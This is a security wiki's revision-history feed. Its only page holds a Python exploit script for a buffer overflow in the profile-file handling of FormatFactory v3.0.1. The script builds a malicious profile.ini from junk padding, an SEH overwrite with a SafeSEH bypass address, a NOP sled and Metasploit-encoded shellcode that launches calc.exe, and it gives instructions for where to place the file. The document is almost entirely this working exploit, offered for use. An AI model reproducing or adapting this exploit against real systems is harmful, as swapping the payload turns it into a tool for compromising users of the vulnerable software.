https://pwnwiki.com/index.php?action=history&feed=atom&title=FormatFactory_v3.0.1_Profile_File_Handling_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E
FormatFactory v3.0.1 Profile File Handling 緩衝區溢出漏洞 - Revision history
2026-04-17T02:55:40Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=FormatFactory_v3.0.1_Profile_File_Handling_%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&diff=726&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> #!/usr/bin/python # Exploit Title: FormatFactory v3.0.1 Profile File Handling Buffer Overflow # Version: <= 3.0.1 # Date: 2012-11-19 # Author:..."
2021-03-27T03:37:05Z
<p>Created page with "==EXP== <pre> #!/usr/bin/python # Exploit Title: FormatFactory v3.0.1 Profile File Handling Buffer Overflow # Version: <= 3.0.1 # Date: 2012-11-19 # Author:..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
#!/usr/bin/python<br />
<br />
# Exploit Title: FormatFactory v3.0.1 Profile File Handling Buffer Overflow<br />
# Version: <= 3.0.1<br />
# Date: 2012-11-19<br />
# Author: Julien Ahrens (@MrTuxracer)<br />
# Homepage: http://www.inshell.net<br />
# Software Link: http://www.pcfreetime.com<br />
# Tested on: Windows XP SP3 Professional German<br />
# Notes: -<br />
# Howto: Copy .ini to %USERPROFILE%\My Documents\FormatFactory\PicCustom<br />
<br />
from struct import pack<br />
<br />
file="profile.ini"<br />
<br />
junk1="\xCC" * 260<br />
nseh="\xeb\x06\x90\x90"<br />
eip=pack('<L',0x024C1923) # CALL DWORD PTR SS:[EBP-C] at 0x024c1923 - SafeSEH Bypass<br />
nops="\x90" * 10<br />
junk2="\xCC" * 10000<br />
<br />
# windows/exec CMD=calc.exe<br />
# Encoder: x86/shikata_ga_nai<br />
# powered by Metasploit<br />
# msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00'<br />
<br />
shellcode = ("\xba\x68\x3e\x85\x1f\xd9\xca\xd9\x74\x24\xf4\x58\x29\xc9" +<br />
"\xb1\x33\x31\x50\x12\x83\xe8\xfc\x03\x38\x30\x67\xea\x44" +<br />
"\xa4\xee\x15\xb4\x35\x91\x9c\x51\x04\x83\xfb\x12\x35\x13" +<br />
"\x8f\x76\xb6\xd8\xdd\x62\x4d\xac\xc9\x85\xe6\x1b\x2c\xa8" +<br />
"\xf7\xad\xf0\x66\x3b\xaf\x8c\x74\x68\x0f\xac\xb7\x7d\x4e" +<br />
"\xe9\xa5\x8e\x02\xa2\xa2\x3d\xb3\xc7\xf6\xfd\xb2\x07\x7d" +<br />
"\xbd\xcc\x22\x41\x4a\x67\x2c\x91\xe3\xfc\x66\x09\x8f\x5b" +<br />
"\x57\x28\x5c\xb8\xab\x63\xe9\x0b\x5f\x72\x3b\x42\xa0\x45" +<br />
"\x03\x09\x9f\x6a\x8e\x53\xe7\x4c\x71\x26\x13\xaf\x0c\x31" +<br />
"\xe0\xd2\xca\xb4\xf5\x74\x98\x6f\xde\x85\x4d\xe9\x95\x89" +<br />
"\x3a\x7d\xf1\x8d\xbd\x52\x89\xa9\x36\x55\x5e\x38\x0c\x72" +<br />
"\x7a\x61\xd6\x1b\xdb\xcf\xb9\x24\x3b\xb7\x66\x81\x37\x55" +<br />
"\x72\xb3\x15\x33\x85\x31\x20\x7a\x85\x49\x2b\x2c\xee\x78" +<br />
"\xa0\xa3\x69\x85\x63\x80\x86\xcf\x2e\xa0\x0e\x96\xba\xf1" +<br />
"\x52\x29\x11\x35\x6b\xaa\x90\xc5\x88\xb2\xd0\xc0\xd5\x74" +<br />
"\x08\xb8\x46\x11\x2e\x6f\x66\x30\x4d\xee\xf4\xd8\xbc\x95" +<br />
"\x7c\x7a\xc1")<br />
<br />
poc="Type=" + junk1 + nseh + eip + nops + shellcode + junk2<br />
<br />
try:<br />
print "[*] Creating exploit file...\n";<br />
writeFile = open (file, "w")<br />
writeFile.write( poc )<br />
writeFile.close()<br />
print "[*] File successfully created!";<br />
except:<br />
print "[!] Error while creating file!";<br />
<br />
</pre></div>
Pwnwiki